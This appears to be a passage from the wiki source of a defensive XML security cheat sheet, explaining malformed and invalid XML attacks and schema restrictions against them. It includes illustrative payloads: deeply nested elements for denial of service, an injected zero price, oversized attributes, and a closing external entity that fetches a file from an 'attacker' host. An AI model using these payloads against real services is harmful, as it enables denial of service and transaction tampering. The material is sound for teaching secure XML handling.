Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
